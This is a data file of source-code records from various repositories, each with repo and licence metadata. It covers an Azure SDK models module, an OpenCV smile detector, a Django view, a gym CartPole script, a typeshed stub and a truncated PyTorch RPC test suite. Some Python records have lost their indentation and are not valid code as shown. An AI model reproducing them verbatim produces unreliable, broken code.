from ._authorization_management_client_enums import AccessReviewActorIdentityType
from ._authorization_management_client_enums import AccessReviewApplyResult
from ._authorization_management_client_enums import AccessReviewInstanceStatus
from ._authorization_management_client_enums import AccessReviewRecurrencePatternType
from ._authorization_management_client_enums import AccessReviewRecurrenceRangeType
from ._authorization_management_client_enums import AccessReviewResult
from ._authorization_management_client_enums import AccessReviewReviewerType
from ._authorization_management_client_enums import AccessReviewScheduleDefinitionReviewersType
from ._authorization_management_client_enums import AccessReviewScheduleDefinitionStatus
from ._authorization_management_client_enums import AccessReviewScopePrincipalType
from ._authorization_management_client_enums import DecisionTargetType
from ._authorization_management_client_enums import DefaultDecisionType
from ._patch import __all__ as _patch_all
from ._patch import * # type: ignore # pylint: disable=unused-wildcard-import
from ._patch import patch_sdk as _patch_sdk
__all__ = [
"AccessReviewDecision",
"AccessReviewDecisionListResult",
"AccessReviewDecisionProperties",
"AccessReviewDecisionTarget",
"AccessReviewDefaultSettings",
"AccessReviewInstance",
"AccessReviewInstanceListResult",
"AccessReviewReviewer",
"AccessReviewScheduleDefinition",
"AccessReviewScheduleDefinitionListResult",
"AccessReviewScheduleDefinitionProperties",
"AccessReviewScheduleSettings",
"ErrorDefinition",
"ErrorDefinitionProperties",
"Operation",
"OperationDisplay",
"OperationListResult",
"ServicePrincipalDecisionTarget",
"UserDecisionTarget",
"AccessRecommendationType",
"AccessReviewActorIdentityType",
"AccessReviewApplyResult",
"AccessReviewInstanceStatus",
"AccessReviewRecurrencePatternType",
"AccessReviewRecurrenceRangeType",
"AccessReviewResult",
"AccessReviewReviewerType",
"AccessReviewScheduleDefinitionReviewersType",
"AccessReviewScheduleDefinitionStatus",
"AccessReviewScopePrincipalType",
"DecisionTargetType",
"DefaultDecisionType",
]
__all__.extend([p for p in _patch_all if p not in __all__])
_patch_sdk()
| [
"[email protected]"
] | |
155abd7d13912aa0987c80a0c964ad7d4fc7990e | 09b22d1bd1263e4082e6bba7afa2f2b7a66afd4a | /FaceDetection/Smile Detector.py | 5dfcb45bf4e354761a24d3842578b36decee18d7 | [] | no_license | yogeshkushwahait/Machine-Learning-Using-Python | b70bc5334c4178fecc175451b8b7e04e50a60917 | 8102ce7b0cba5d48e923f979ae0a8e71c25857b1 | refs/heads/master | 2022-03-28T05:21:24.332537 | 2019-11-05T06:34:00 | 2020-01-09T16:06:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,172 | py |
# coding: utf-8
# In[2]:
import cv2
# In[3]:
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml');
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml');
smile_cascade = cv2.CascadeClassifier('haarcascade_smile.xml');
# In[4]:
def detect(gray,frame):
faces = face_cascade.detectMultiScale(gray, 1.3,5)
for (x,y,w,h) in faces:
cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)
roi_gray = gray[y:y+h,x:x+w]
roi_color = frame[y:y+h,x:x+w]
eyes = eye_cascade.detectMultiScale(roi_gray, 1.1,22)
for (ex,ey,ew,eh) in eyes:
cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)
smiles = smile_cascade.detectMultiScale(roi_gray, 1.7,22)
for (sx,sy,sw,sh) in smiles:
cv2.rectangle(roi_color,(sx,sy),(sx+sw,sy+sh),(0,0,255),2)
return frame
# In[5]:
video_capture = cv2.VideoCapture(0)
while True:
_, frame = video_capture.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
canvas = detect(gray, frame)
cv2.imshow('Video', canvas)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.release()
cv2.destroyAllWindows()
| [
"[email protected]"
] | |
4402400f9646593187e43c7982a4e61d0d01b033 | 786de89be635eb21295070a6a3452f3a7fe6712c | /pandas/tags/V00-00-02/SConscript | b42efd570012fd5fb90cb1ffb13d916266eb5ce8 | [] | no_license | connectthefuture/psdmrepo | 85267cfe8d54564f99e17035efe931077c8f7a37 | f32870a987a7493e7bf0f0a5c1712a5a030ef199 | refs/heads/master | 2021-01-13T03:26:35.494026 | 2015-09-03T22:22:11 | 2015-09-03T22:22:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 769 | #------------------------------------------------------------------------
# File and Version Information:
# $Id: SConscript 4651 2012-10-26 16:55:30Z [email protected] $
#
# Description:
# SConscript file for package pandas
#------------------------------------------------------------------------
# Do not delete following line, it must be present in
# SConscript file for any SIT project
Import('*')
from os.path import join as pjoin
from SConsTools.standardExternalPackage import standardExternalPackage
pkg = "pandas"
pkg_ver = "0.13.1b"
PREFIX = pjoin('$SIT_EXTERNAL_SW', pkg, pkg_ver)
PYDIR = pjoin('$PYTHON_LIBDIRNAME', '$PYTHON', "site-packages")
PKGINFO = (pkg, pkg_ver, '$PYTHON', '$SIT_ARCH.found')
standardExternalPackage(pkg, **locals())
| [
"[email protected]@b967ad99-d558-0410-b138-e0f6c56caec7"
] | [email protected]@b967ad99-d558-0410-b138-e0f6c56caec7 |
|
e51fbe1d83fc18c0809ef65f62e0f7a148dfdd77 | a672f984782a1fa328069363671c328da3e4d8bd | /weatherdaily/views.py | 40d1077ff5095487d6bbd95bd1a79c2aceed8864 | [] | no_license | avs8/yourweather | 396a0b093cbc9fc9b501eb979418e10eecfadf2b | 2415769dad416c9fcf99d57cba93b455d30447fc | refs/heads/master | 2021-08-29T08:11:16.664340 | 2017-12-13T14:15:44 | 2017-12-13T14:15:44 | 112,365,929 | 0 | 0 | null | 2017-12-11T14:35:38 | 2017-11-28T17:20:17 | JavaScript | UTF-8 | Python | false | false | 558 | py | from django.shortcuts import render, render_to_response
from .forms import WeatherForm
from django.http import HttpResponse
from django.template import RequestContext
from .models import *
def index(request):
args = {}
if request.POST:
form = WeatherForm(request.POST)
if form.is_valid():
form.save()
return HttpResponse("Thanks for submitting your information!!")
else:
form = WeatherForm()
args = {}
args['form'] = form
return render(request, 'weatherdaily/index.html', args)
| [
"[email protected]"
] | |
22026862c4779187068f89cb47fe0e6b11a7c0f0 | 18a6b272d4c55b24d9c179ae1e58959674e53afe | /tf_rl/test/CartPole/CartPole_recording_test.py | b8d3760e15ebd4d0ca5d66f39bae6090d71f9a17 | [
"MIT"
] | permissive | Rowing0914/TF2_RL | 6cce916f409b3d4ef2a5a40a0611908f20d08b2c | c1b7f9b376cbecf01deb17f76f8e761035ed336a | refs/heads/master | 2022-12-10T09:58:57.456415 | 2021-05-23T02:43:21 | 2021-05-23T02:43:21 | 233,476,950 | 9 | 1 | MIT | 2022-12-08T07:02:42 | 2020-01-12T23:53:48 | Python | UTF-8 | Python | false | false | 503 | py | import gym
env = gym.make('CartPole-v0')
gym.wrappers.Monitor(env, './tmp/cartpole-experiment-1', force=True, video_callable=lambda episode_id: True)
for i_episode in range(20):
observation = env.reset()
for t in range(100):
env.render()
print(observation)
action = env.action_space.sample()
observation, reward, done, info = env.step(action)
if done:
print("Episode finished after {} timesteps".format(t + 1))
break
env.close()
| [
"[email protected]"
] | |
21fe54b94c5e5b3cd05505d1e5b489b734e9a820 | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/helpers/typeshed/stubs/setuptools/setuptools/_distutils/archive_util.pyi | 38458fc0e00349e77ebf105fdf5a52e850bc9e25 | [
"Apache-2.0",
"MIT"
] | permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 548 | pyi | def make_archive(
base_name: str,
format: str,
root_dir: str | None = ...,
base_dir: str | None = ...,
verbose: int = ...,
dry_run: int = ...,
owner: str | None = ...,
group: str | None = ...,
) -> str: ...
def make_tarball(
base_name: str,
base_dir: str,
compress: str | None = ...,
verbose: int = ...,
dry_run: int = ...,
owner: str | None = ...,
group: str | None = ...,
) -> str: ...
def make_zipfile(base_name: str, base_dir: str, verbose: int = ..., dry_run: int = ...) -> str: ...
| [
"[email protected]"
] | |
26556f32fd856b8732227ea6ddcc48bd711e6877 | 4412fd856cfbdfab98122b11ea01e447a76851b3 | /rodentdb/querysets.py | 063568ed8e0276d9a070a898fd61d93c93f1a13b | [] | no_license | fchampalimaud/rodentdb | d8e8c0c7552de638d3a2fd57de287401997fdf3c | 4a970c09da78f22a8c57d8ea98d29a569f531613 | refs/heads/master | 2021-06-18T02:05:19.200858 | 2019-09-17T18:09:57 | 2019-09-17T18:09:57 | 185,334,185 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 367 | py | from django.db import models
from users.mixins import PyformsPermissionsMixin
# FIXME import this when users model is not present
# try:
# from users.mixins import PyformsPermissionsMixin
# except ImportError:
# PyformsPermissionsMixin = None
# # PyformsPermissionsMixin = object
class RodentQuerySet(PyformsPermissionsMixin, models.QuerySet):
...
| [
"[email protected]"
] | |
5a850bb6a63234b950eedb091013eaf3870c052c | 88237dd1932c346acade7001f22d0fc7190da55c | /torch/testing/_internal/distributed/rpc/rpc_test.py | a149c541a090e422aa02b0beb16eeb237c85ba35 | [
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | kkleidal/pytorch | 4d7e95d0035bb03509dce6624e857c118279d08d | 815d38395a5081adef6ecec3372474f6f41b2a7c | refs/heads/master | 2023-02-06T11:00:27.985596 | 2020-12-17T17:30:02 | 2020-12-17T17:32:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178,866 | py | import concurrent.futures
import contextlib
import json
import logging
import os
import sys
from threading import Lock
import time
import unittest
from collections import namedtuple
from functools import partial
from unittest import mock
import torch
import torch.distributed as dist
import torch.distributed.rpc as rpc
import torch.distributed.autograd as dist_autograd
from torch.distributed.rpc import RRef, _get_debug_info, _rref_context_get_debug_info
from torch.distributed.rpc.api import _delete_all_user_and_unforked_owner_rrefs, _use_rpc_pickler, _thread_local_var, _wait_all
from torch.distributed.rpc.internal import (
PythonUDF,
RPCExecMode,
_internal_rpc_pickler,
_build_rpc_profiling_key,
)
from torch.testing._internal.common_distributed import skip_if_lt_x_gpu, captured_output
from torch.testing._internal.common_utils import IS_MACOS, load_tests
from torch.testing._internal.dist_utils import (
dist_init,
get_function_event,
initialize_pg,
wait_until_node_failure,
wait_until_pending_futures_and_users_flushed,
wait_until_owners_and_forks_on_rank,
worker_name,
single_threaded_process_group_agent,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_utils import TemporaryFileName
def foo_add():
return torch.add(torch.ones(1), torch.ones(1))
def udf_with_torch_ops(device=-1, use_record_function=False):
device_ctx = contextlib.suppress() if device == -1 else torch.cuda.device(device)
record_function_ctx = (
torch.autograd.profiler.record_function("##forward##")
if use_record_function
else contextlib.suppress()
)
with device_ctx, record_function_ctx:
t1, t2 = torch.ones(1), torch.ones(1)
t = torch.add(t1, t2)
t = torch.mul(t, t)
t = t.relu()
t = t.sigmoid()
# Events (operator invocations) that are expected to be ran as part of the above
# function.
EXPECTED_REMOTE_EVENTS = [
"aten::ones",
"aten::ones",
"aten::add",
"aten::mul",
"aten::relu",
"aten::threshold",
"aten::sigmoid",
]
# Remote operations are prefixed with the following string for RPC profiling.
REMOTE_OP_STR = "#remote_op: "
VALUE_FUTURE = concurrent.futures.Future()
DONE_FUTURE = concurrent.futures.Future()
class StubRpcAgent:
def __init__(self, world_size):
self.world_size = world_size
def get_worker_infos(self):
return {
rpc.WorkerInfo(name=worker_name(rank), id=rank)
for rank in range(self.world_size)
}
def _stub_construct_rpc_backend_options_handler(**kwargs):
return mock.Mock() # RpcBackendOptions.
def _stub_init_rpc_backend_handler(store, name, rank, world_size, rpc_backend_options):
return StubRpcAgent(world_size=world_size)
def set_value(value):
VALUE_FUTURE.set_result(value)
def wait_for_value_future():
return VALUE_FUTURE.result()
def set_and_check_done(value):
VALUE_FUTURE.set_result(value)
return DONE_FUTURE.result()
# it is used to test python user defined function over rpc
# classes and functions are used to test python user defined class and
# methods over rpc
TensorClass = namedtuple("TensorClass", ["tensors"])
class MyPickleClass:
def __init__(self):
self.t = None
def __getstate__(self):
(pickled_python_udf, tensors) = _internal_rpc_pickler.serialize(
PythonUDF(my_tensor_function, (torch.ones(2, 2), torch.ones(2, 2)), None)
)
return (pickled_python_udf, tensors)
def __setstate__(self, obj):
python_udf = _internal_rpc_pickler.deserialize(obj[0], obj[1])
result = python_udf.func(python_udf.args[0], python_udf.args[1])
self.t = result
def set(self, val):
self.t = val
class SlowPickleClass:
def __init__(self, t):
self.t = t
def __getstate__(self):
time.sleep(self.t)
return (self.t, )
def __setstate__(self, obj):
self.t = obj[0]
time.sleep(self.t)
class MyClass:
def __init__(self, a):
self.a = a
def my_instance_method(self, b):
return self.a + b
@classmethod
def my_class_method(cls, d, e):
return d + e
@staticmethod
def my_static_method(f):
return f > 10
def increment_value(self, increment):
self.a += increment
def get_value(self):
return self.a
def _call_method_on_rref(method, rref, *args, **kwargs):
return method(rref.local_value(), *args, **kwargs)
def get_rref_list(values):
return [RRef(MyClass(a)) for a in values]
def add_rref_to_value(rref, value):
return rref.to_here() + value
def run_nested_pickle(pickle_cls_instance, tensor):
return pickle_cls_instance.t + tensor
def build_complex_tensors():
a = torch.ones(3, 3)
b = [a, a]
c = [b, b]
d = [a, b]
e = {a: d}
return [a, b, c, d, e]
def non_cont_test(t_view, t_cont):
if t_view.is_contiguous():
raise Exception('t_view is contiguous!')
if not t_cont.is_contiguous():
raise Exception('t_cont is not contiguous!')
if not torch.equal(t_view, t_cont):
raise Exception('t_view is not equal to t_cont!')
return t_view
def my_function(a, b, c):
return a + b + c
def my_tensor_function(a, b):
return a + b
def my_sleep_func(seconds=1):
time.sleep(seconds)
return torch.mul(torch.tensor(1), torch.tensor(1))
def my_complex_tensor_function(list_input, tensor_class_input, dict_input):
res = list_input[0]
for t in list_input:
res += t
for k, v in dict_input.items():
res += v
complex_tensors = tensor_class_input.tensors
return (res, complex_tensors[0], complex_tensors[1], complex_tensors[2])
def my_rref_function(rref_a, rref_b):
return rref_a.to_here() + rref_b.to_here()
def delayed_add(a, b, seconds=0.05):
time.sleep(seconds)
return a + b
def no_result():
print("do nothing")
def raise_or_inc(value):
if value.numel() == 2:
raise ValueError("Expected error")
return value + 1
def nested_rpc(dst):
return rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
def multi_layer_nested_async_rpc(dst, world_size, ttl):
# this method returns immediately without blocking the callee, but will
# generate additional requests.
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
rpc.rpc_async(
current_dst,
multi_layer_nested_async_rpc,
args=(next_dst, world_size, ttl - 1),
)
return 0
def nested_rref(dst):
return (
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1)),
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 2)),
)
def nested_remote(dst):
rref = rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 3))
return rref.to_here()
def rref_forward_chain(dst, world_size, rref, ttl):
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
ret_rref = rpc.remote(
current_dst, rref_forward_chain, args=(next_dst, world_size, rref, ttl - 1)
)
return [ret_rref]
else:
return rref.to_here()
def rpc_return_rref(dst):
return rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1))
def light_rpc():
return 0
def heavy_rpc(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def heavy_rpc_torchscript(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def my_script_func(tensor):
return torch.add(tensor, tensor)
expected_err = "Expected error"
def raise_func():
raise ValueError(expected_err)
expected_err_escape = "\nFirst line of error \n next line of error \n last line of error"
def raise_func_escape():
raise ValueError(expected_err_escape)
global_rref = None
def set_global_rref(rref):
global global_rref
global_rref = rref
def clear_global_rref():
global global_rref
global_rref = None
def check_rref_confirmed(rref):
return rref.confirmed_by_owner()
def get_rref_debug_info():
return _rref_context_get_debug_info()
def add_use_future_cb(to, x, y, z):
out = concurrent.futures.Future()
def callback(fut):
out.set_result(fut.wait() + z)
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(callback)
return out.result()
def get_events_from_profile(profile_rref):
return profile_rref.local_value().process_global_function_events
def add_use_future_set_result(to, x, y, z):
out = torch.futures.Future()
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(lambda fut : out.set_result(fut.wait() + z))
return out.wait()
def add_use_future_nested_cb(to, x, y, z):
out = torch.futures.Future()
def callback(fut1):
fut2 = rpc.rpc_async(to, torch.add, args=(fut1.wait(), z))
fut2.then(lambda fut2 : out.set_result(fut2.wait()))
fut1 = rpc.rpc_async(to, torch.add, args=(x, y))
fut1.then(callback)
return out.wait()
def fail_on_fut(fut):
pass
@rpc.functions.async_execution
def async_raise_func():
raise RuntimeError("Expected error")
@rpc.functions.async_execution
def async_wrong_type():
return torch.zeros(2, 2)
@rpc.functions.async_execution
def async_add(to, x, y):
return rpc.rpc_async(to, torch.add, args=(x, y))
def slow_add(x, y, device="cpu"):
time.sleep(1)
x = x.to(device)
y = y.to(device)
return torch.add(x, y).cpu()
@rpc.functions.async_execution
def slow_async_add(to, x, y, device="cpu"):
return rpc.rpc_async(to, slow_add, args=(x, y, device))
@rpc.functions.async_execution
def async_add_with_future_ctor(to, x, y, z):
fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut1: fut.set_result(fut1.wait() + z)
)
return fut
@rpc.functions.async_execution
def async_add_chained(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_chained_multi(to, x, num, step):
fut = rpc.rpc_async(to, torch.add, args=(x, 0))
for _ in range(num):
fut = fut.then(lambda fut: fut.wait() + step)
return fut
@rpc.functions.async_execution
def async_add_nested(to, x, y, z):
return rpc.rpc_async(to, async_add, args=(to, x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_multi_fanout(to, x, num, step):
futs = []
for i in range(num):
if i == 0:
futs.append(rpc.rpc_async(to, torch.add, args=(x, step)))
else:
futs.append(rpc.rpc_async(to, torch.add, args=(0, step)))
# TODO: use torch.futures.collect_all
lock = Lock()
state = {"cnt": 0, "ret": torch.zeros_like(x)}
ret_future = torch.futures.Future()
def inc_and_set(fut):
with lock:
state["cnt"] += 1
state["ret"] += fut.wait()
if state["cnt"] >= len(futs):
ret_future.set_result(state["ret"])
for fut in futs:
fut.then(inc_and_set)
return ret_future
class AsyncExecutionClass:
@staticmethod
@rpc.functions.async_execution
def static_async_add(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@classmethod
@rpc.functions.async_execution
def class_async_add(cls, to, x, y, z):
ret_fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: ret_fut.set_result(fut.wait() + z)
)
return ret_fut
@rpc.functions.async_execution
def bound_async_add(self, to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
def return_future():
return torch.futures.Future()
class FooBackendOptions(rpc.RpcBackendOptions):
def __init__(self, init_method):
# Must call the __init__ of the superclass (and do so directly,
# without using super()) because... pybind.
rpc.RpcBackendOptions.__init__(self)
self.init_method = init_method
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
class RpcTest(RpcAgentTestFixture):
@dist_init
def test_worker_id(self):
n = self.rank + 1
peer_rank = n % self.world_size
self_worker_info = rpc.get_worker_info()
peer_worker_info = rpc.get_worker_info(worker_name(peer_rank))
self.assertEqual(self_worker_info.name, worker_name(self.rank))
self.assertEqual(peer_worker_info.name, worker_name(peer_rank))
with self.assertRaisesRegex(RuntimeError, "Unknown destination worker"):
unknown_worker_id = rpc.get_worker_info("WorkerUnknown")
@dist_init
def test_get_worker_infos(self):
worker_infos = rpc.api._get_current_rpc_agent().get_worker_infos()
worker_names = {worker_info.name for worker_info in worker_infos}
expected_worker_names = {
worker_name(rank) for rank in range(self.world_size)
}
self.assertEqual(worker_names, expected_worker_names)
worker_ids = {worker_info.id for worker_info in worker_infos}
expected_worker_ids = set(range(self.world_size))
self.assertEqual(worker_ids, expected_worker_ids)
@dist_init
def test_self_add(self):
self_worker_info = rpc.get_worker_info()
self_worker_name = worker_name(self.rank)
fut = rpc.rpc_async(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
ret = rpc.rpc_sync(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertEqual(ret, torch.ones(2, 2) + 1)
@dist_init
def test_send_to_rank(self):
dst_rank = (self.rank + 1) % self.world_size
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test invalid ranks
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(self.world_size + 1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(-1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank + 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank - 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
@dist_init
def test_self_py_udf_remote(self):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1 + 3)
def _test_self_remote_rref_as_rpc_arg(self, dst):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
fut = rpc.rpc_async(dst, add_rref_to_value, args=(rref, torch.ones(2, 2)))
ret = rpc.rpc_sync(dst, add_rref_to_value, args=(rref, torch.ones(2, 2) + 1))
self.assertEqual(ret, torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2) + 1)
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2))
@dist_init
def test_self_remote_rref_as_rpc_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_self_remote_rref_as_rpc_arg(dst)
@dist_init
def test_self_remote_rref_as_self_rpc_arg(self):
self._test_self_remote_rref_as_rpc_arg(rpc.get_worker_info())
def _test_self_remote_rref_as_remote_arg(self, dst):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
ret_rref = rpc.remote(dst, add_rref_to_value, args=(rref, torch.ones(2, 2)))
self.assertEqual(
ret_rref.to_here(), torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2)
)
@dist_init
def test_self_remote_rref_as_remote_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_self_remote_rref_as_remote_arg(dst)
@dist_init
def test_rref_proxy_non_exist(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
msg = "has no attribute \'non_exist\'"
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_sync().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_async().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.remote().non_exist()
def _test_rref_proxy_tensor(self, dst):
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
expected = torch.ones(2, 2) + 1 + 3
self.assertEqual(expected.size(), rref.rpc_sync().size())
self.assertEqual(expected + 1, rref.rpc_async().add(1).wait())
self.assertEqual(expected.view(1, 4), rref.remote().view(1, 4).to_here())
@dist_init
def test_rref_proxy_tensor(self):
self._test_rref_proxy_tensor(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_tensor_self(self):
self._test_rref_proxy_tensor(rpc.get_worker_info())
@dist_init
def test_rref_proxy_reuse(self):
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
my_function,
args=(torch.ones(2, 2), 1, 3)
)
expected = torch.ones(2, 2) + 1 + 3
proxy_rpc_sync = rref.rpc_sync()
proxy_rpc_async = rref.rpc_async()
proxy_remote = rref.remote()
self.assertEqual(expected.size(), proxy_rpc_sync.size())
self.assertEqual(expected + 1, proxy_rpc_sync.add(1))
self.assertEqual(expected.view(1, 4), proxy_rpc_sync.view(1, 4))
self.assertEqual(expected.size(), proxy_rpc_async.size().wait())
self.assertEqual(expected + 3, proxy_rpc_async.add(3).wait())
self.assertEqual(expected.view(4, 1), proxy_rpc_async.view(4, 1).wait())
self.assertEqual(expected.size(), proxy_remote.size().to_here())
self.assertEqual(expected + 5, proxy_remote.add(5).to_here())
self.assertEqual(expected.view(-1), proxy_remote.view(-1).to_here())
def _test_rref_proxy_class(self, dst):
rref = rpc.remote(dst, MyClass, args=(7,))
expected = MyClass(7)
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
expected.increment_value(3)
self.assertEqual(None, rref.rpc_sync().increment_value(1))
self.assertEqual(None, rref.rpc_async().increment_value(1).wait())
self.assertEqual(None, rref.remote().increment_value(1).to_here())
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
self.assertEqual(
expected.my_instance_method(2),
rref.rpc_sync().my_instance_method(2)
)
self.assertEqual(
expected.my_instance_method(3),
rref.rpc_async().my_instance_method(3).wait()
)
self.assertEqual(
expected.my_instance_method(4),
rref.remote().my_instance_method(4).to_here()
)
self.assertEqual(
expected.my_static_method(9),
rref.rpc_sync().my_static_method(9)
)
self.assertEqual(
expected.my_static_method(10),
rref.rpc_async().my_static_method(10).wait()
)
self.assertEqual(
expected.my_static_method(11),
rref.remote().my_static_method(11).to_here()
)
self.assertEqual(
expected.my_class_method(2, torch.zeros(2, 2)),
rref.rpc_sync().my_class_method(2, torch.zeros(2, 2))
)
self.assertEqual(
expected.my_class_method(2, torch.ones(3, 3)),
rref.rpc_async().my_class_method(2, torch.ones(3, 3)).wait()
)
self.assertEqual(
expected.my_class_method(2, torch.ones(4, 4)),
rref.remote().my_class_method(2, torch.ones(4, 4)).to_here()
)
@dist_init
def test_rref_proxy_class(self):
self._test_rref_proxy_class(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_class_self(self):
self._test_rref_proxy_class(rpc.get_worker_info())
@dist_init
def test_self_remote_rref_as_self_remote_arg(self):
self._test_self_remote_rref_as_remote_arg(rpc.get_worker_info())
@mock.patch.object(torch.distributed.autograd, "_init")
@mock.patch.object(torch.distributed.rpc.api, "_set_and_start_rpc_agent")
@dist_init(setup_rpc=False)
def test_register_rpc_backend_and_set_and_start_rpc_backend(
self, mock_rpc_agent, mock_dist_autograd_init
):
backend_name = "stub_backend"
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
with self.assertRaisesRegex(
RuntimeError, "^RPC backend .+: already registered$"
):
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
rpc.init_rpc(
name="worker1",
backend=backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
store, _, _ = next(
torch.distributed.rendezvous(
self.init_method, rank=self.rank, world_size=self.world_size
)
)
rpc._init_rpc_backend(
backend=self.rpc_backend,
store=store,
name="duplicate_name",
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_reinit(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
# TODO: with TCP init, rank 0 raises Address already in use because
# rank 0 is the start daemon and the store is created before checking if
# RPC is already initialized in init_rpc.
if os.environ.get("RPC_INIT_WITH_TCP", None) == "1" and self.rank == 0:
expected_reinit_err = "Address already in use"
else:
expected_reinit_err = "is already initialized"
with self.assertRaisesRegex(RuntimeError, expected_reinit_err):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
def test_world_size_one(self):
if self.rank == 0:
rpc.init_rpc(
